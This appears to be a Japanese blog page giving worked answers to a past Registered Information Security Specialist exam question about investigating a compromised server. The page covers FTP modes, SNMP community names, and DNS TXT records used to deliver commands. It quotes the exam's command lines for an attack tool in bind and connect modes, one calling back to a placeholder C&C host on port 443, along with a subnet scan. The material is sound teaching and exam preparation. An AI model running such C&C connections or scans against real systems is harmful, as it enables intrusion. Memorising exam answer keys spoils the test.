情報処理安全確保支援士試験 過去問 令和5年 春 午後1問2

スポンサーリンク

令和06年【春期】【秋期】 情報処理安全確保支援士 合格教本 情報処理技術者試験
サイバーセキュリティ対策を担う人材のための国家資格、「情報処理安全確保支援士」合格のためのテキストです。これまでの出題実績や最新の技術トレンドを分析し、頻出問題を詳しく、分かりやすく解説しています。選択問題で構成される午前問題、記述形式で問われる午後問題の両方に対応している、付録アプリのDEKIDAS-Webには過去2...
www.amazon.co.jp
令和05年【春期】【秋期】情報処理安全確保支援士合格教本 情報処理安全確保支援士試験
情報処理のスペシャリスト、岡嶋裕史氏による渾身の一冊。午前の知識編は、知識解説+確認問題でしっかり理解、午後編は読み方指南がわかりやすく、問題点の発見・記述力の両方が身に付きます。読者特典のWebアプリは午前I試験・午前II試験それぞれ27回分の問題演習と結果分析ができる優れもの。スマホでもPCでもいつでも利用できます...
www.amazon.co.jp

設問1

問題 本文中の「a」に入れる適切な字句を答えよ

FTPにはアクティブモードとパッシブモードがあり、
アクティブモード: サーバーからクライアントへデータ接続を実施
パッシブモード: クライアントからサーバーへデータ接続を実施
なので、問題文でDBサーバから製造管理サーバへなっているので「パッシブ」モードとなります
(問題の表1のログを見ると、1-233でDBサーバ(192.168.0.2)から製造管理サーバ(192.168.1.145)への接続ログが確認できます)

答え:パッシブ

設問2

(1)

問題 本文中の「b」に入れる適切な字句を、10字以内で答えよ

SNMP(SNMPv1・SNMPv2c)は、パスワードのような文字列を使い認証します。
これを「コミュニティ名」と呼びます

答え:コミュニティ

(2)

問題 本文中の「c」に入れる適切な字句を、”バインド”又は”コネクト”から選び答えよ。また下線①について、Mさんがそのように判断した理由を表1中~表3中の項番を各表から一つずつ示した上で、40字以内で答えよ。

srvは攻撃ツールということが解りました。
そして2種類のモードがあり、バインドモード(外部からの接続を待ち受ける)とコネクトモード(外部に自ら接続する)があります。
「c」はC&Cサーバに接続が失敗しているとあるので、失敗内容を確認すると
表2「2-3」で「./srv -c -mode baind 0.0.0.0:8080 2>&1」を実行して
  ./srv :カレントディレクトリにある srv というファイル(プログラム)を起動
  -c : オプション(
  -mode bind :「バインドモード」を指定
  0.0.0.0: 8080 :「0.0.0.0(すべてのネットワーク)」から8080ポートでリクエストを受付ける設定
  2> &1 : srvが生成するエラーメッセージも、通常の出力と一緒に表示される
表3「3-3」で0.0.0.0:8080で待ち受け状態となっていることが解り、
表1「1-3」で外部から受付サーバへ8080でアクセスが来ている事が解り、更にその通信をFWで拒否している事が解ります。

答え c:バインド
下線①の判断理由:2-3によって起動した3-3のポートへの通信が1-3で拒否されているから

(3)

問題 本文中の「d」に入れる適切な字句を、”バインド”又は”コネクト”から選び答えよ。また下線②について、Mさんがそのように判断した理由を表1中~表3中の項番を各表から一つずつ示した上で、40字以内で答えよ。

(2)と違い今度は成功した時のモードと理由となります。
表2「2-4」で「./srv -c -mode connect a0.b0.c0.d0:443 2>&1」を実行しています。
  -mode connect:「コネクトモード」を指定
コネクトモードは自分から外部へアクセスするモードとなりますので、宛先「a0.b0.c0.d0」へポート443でアクセスを実施します。
表3「3-4」で宛先「a0.b0.c0.d0」へポート443で接続が完了(ESTABLISHED)していることが解ります。
表1「1-4」でも受付サーバから宛先「a0.b0.c0.d0」へポート443での接続が許可されています。

答え d:コネクト
下線②の判断理由:2-4によって開始された3-4の通信が1-4で許可されているから

(4)

問題 本文中の「e」に入れる適切な数を、表2中から選び答えよ

表2「2-5」で「./srv -s -range 192.168.0.1-192.168.255.254」を実行しています。
これで192.168.0.1-192.168.255.254の範囲のアドレスへポートスキャンをしていると思われます。
※答えはPIDなので注意

答え e:1365

設問3

(1)

問題 本文中の下線③について、Aレコードではこのような攻撃ができないが、TXTレコードではできる。TXTレコードではできる理由を、DNSプロトコル使用を踏まえて30字以内で答えよ

Aレコードは最も基本的なDNSレコードで、ドメイン名とIPアドレスを結びつけます。
なのでもし攻撃者がAレコードに悪意のあるコマンドを書き込んで、クライアントがそれを取得しても、それをIPアドレスと認識するので、何もできません。
しかしTXTレコードでは任意の情報を登録できます。

なので受付サーバは、DNSで△△△.comのTXTレコードを要求し、TXTレコードに登録されていた図2の文字列を取得して、取得したデータをそのまま実行されたようです。

答え:TXTレコードには任意の文字列を設定できるから

(2)

問題 本文中の下線④について、適切ではない理由を、30字以内で答えよ

Mさんが図2の結果を確認して、URLから取得するのに時間がたっているので、ブラウザで取得したファイルと実際に稼働しているファイルが同じである保証がないので、実際に稼働しているファイルを確認するのが確実です。

答え:稼働しているファイルと内容が異なる可能性があるから

(3)

問題 本文中の「f」に入れる適切なサーバ名を、10字以内で答えよ

図2でTXTを取得したサーバで、logdが実際に稼働している調査対象のサーバは受付サーバですね

答え f:受付サーバ

スポンサーリンク

コメント

タイトルとURLをコピーしました